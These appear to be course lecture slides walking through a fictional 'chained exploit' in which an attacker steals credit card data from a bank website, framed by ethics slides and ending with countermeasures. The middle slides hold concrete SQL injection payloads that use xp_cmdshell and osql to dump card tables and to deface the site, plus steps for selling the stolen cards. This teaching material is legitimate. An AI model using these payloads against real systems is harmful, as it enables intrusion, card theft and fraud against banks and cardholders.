TEL 283Getting out of Credit Card Debt

Chained Exploits◦ Whitaker, Evans, Voth; Addison-Wesley, 2009

Resources Utilized

Methods discussed in course are considered illegal◦ Under no circumstances should tools or methods

be utilized on any networked system without the explicit written permission of an authorized grantor within that organization Document should be witnessed and should delineate

the boundaries of your actions◦ Signed document for this course indicating that

you understand and appreciate the nature of the concepts and methodologies

Ethics

What is the purpose of instructing these methods and tools?◦ So that you, as a professional, will understand the

methods and tools and be able to determine When and how they were leveraged against you Find traces of them during an investigation Pro-actively search and deter an attack

Ethics

Attack consisting of several exploits or attacks in order to achieve a goal

What is a “Chained Exploit”?

“Phoenix” (obviously not his real name) is in debt for thousands of dollars to a bank’s credit card system, and his rate has just gone up to 29%◦ Plans to pay off his debt by hitting the bank’s

system (PDXO Financial) If he uses another person’s card to pay off his, it’ll be

noticed Plans to steal cc information and sell it on the black

market

Credit Card debt

1. Enumerate the website2. Enumerate the cc database3. Get cc info from the website4. Sell the cc info on the underground market5. Trash to website (misdirection)

Steps

Uncover as much information about the website as possible◦ Operating system◦ Web server version running

RFC 2616 specifies the format of the HTTP responses

Some headers returned might contain valuable information regarding the server or site

Enumerate the website

Telnet to the website on port 80 (or whatever port the site is on)

telnet www.PDXOfinancial.com 80 Once connected

◦ Issue the command to receive the site’s HTTP header

HEAD / http /1.1[cr][cr]

Server type might be revealed◦ Example show www.marist.edu “HEAD” request

Enumerate the website

Tool developed by the Cult of the Dead Cow◦ www.cultdeadcow.com◦ Uses Google hacking techniques discovered by

Johnny Long (johnny.ihackstuff.com) Checks strings against website to find files

containing passwords, vulnerable files, or directories of interest

GoolagScan

PDXO merged◦ Might have development websites running due to

changes development.PDXOfinancial.com beta.PDXOfinancial.com test.PDXOfinancial.com dev.PDXOfinancial.com

Checking possible sites might result in bringing up an unprotected web page◦ In this case, the login form

Background information

Is the DB server on the same host as the website? Is MS SQL server used for DB?

◦ Default username of “SA” w/o password? Is the website installed in the default IIS location?

◦ inetpub\wwwroot◦ This directory allows for write access

This presumes several weaknesses◦ Possible due to page coming from a development site◦ Moral: build security in, even during the development

phase of the SDLC

Enumerate the CC Database

The ability of a user to craft an SQL or database command from the client side

SQL Injection

The default database is called “MASTER” Get the names of the databases in the MASTER

fileselect * from master..sysdatabases

◦ The database expects a username prior to this command, so we need to fool the database into thinking we’ve already done this Supply a command terminator character “;” before the

select command; select * from master..sysdatabases

◦ Prevent another command from being entered after this by adding a “comment” indicator after the command “--”; select * from master..sysdatabases --

Uncover the names of the databases

The difficulty with the sql command is that the output would not return◦ Use “osql”, which is a command line utility◦ Send the output to a text file

Parameters for osql◦ -U username◦ -P password (blank if none supplied)◦ -Q enter SQL command and exit◦ -o output file specifiedosql –U sa –P “” –Q “select * from master..sysdatabases” –o c:\inetpub\wwwroot\

output.txt

OSQL

osql is a command line utility and needs to be entered at the command prompt◦ Hacker is not at a command prompt◦ Can use an SQL stored procedure which will

execute a command◦ exec xp_cmdshell ‘<command goes here>’

So…

exec xp_cmdshell ‘osql –U sa –P “” –Q “select * from master..sysdatabases” –o c:\inetpub\wwwroot\output.txt’ --

OSQL

Phoenix uses the form to submit his SL command to the webserver◦ Webserver passes along the command to the database

server for execution w/o verification◦ Text file is written to the webserver’s document directory

Phoenix changes the URL to that of the output file on the server in order to browse the contents

Examine the contents and see if there are any databases of interestcreditcardsC:\Program Files\Microsoft SQL Server\MSSQL\data\creditcards.MDF

SQL Injection

Now that you have the name of the database◦ Get the table names by changing the SQL commandselect * from creditcards..sysobjects

One of the tables is called “cardnumbers”select * from creditcards..cardnumbers

The dumped information will be in the output file on the IIS server◦ Contains names, expiration dates, CVV’s, CC

numbers, and PINs

SQL Injection

Phoenix uses NNTP client (NewsRover) to check alt.2600 newsgroup◦ Post a message regarding sale of cc info

Set up a bogus email address◦ getyourcardshere@gmail.com

Use “spammimmic” to disguise a spammed message◦ Looks like a spam message, but those in the know will recover

the hidden message using spammimmic Can be passwroded with a password or as phony PGP message, or

false Cyrillic text This message is posted to alt.2600 using the phony email address

Respondent agrees to pay $12,000 into a Swiss account◦ Phoenix’s CC number is one of the many cards sold

Phoenix cancels his card

Selling CC Information

IIS 5.0 Server MS SQL Server

◦ Default username of SA w/o password◦ Hosted on the same host as the website

xp_cmdshell stored procedure will be used to overwrite the landing page on the website

;exec xp_cmdshell ‘echo You’ve been hacked! > c:\inetput\wwwroot\default.asp’ --

Defacing the Website

Change the default HTTP Response header Do not allow public access to the development

sites Do not keep the SQL server on the same host

as the IIS server “Sanitize” / validate user form input Don’t put IIS in the default location Make the site read-only Don’t keep unnecessary stored procedures Don’t use defaults (username / passwords) for

the database

Countermeasures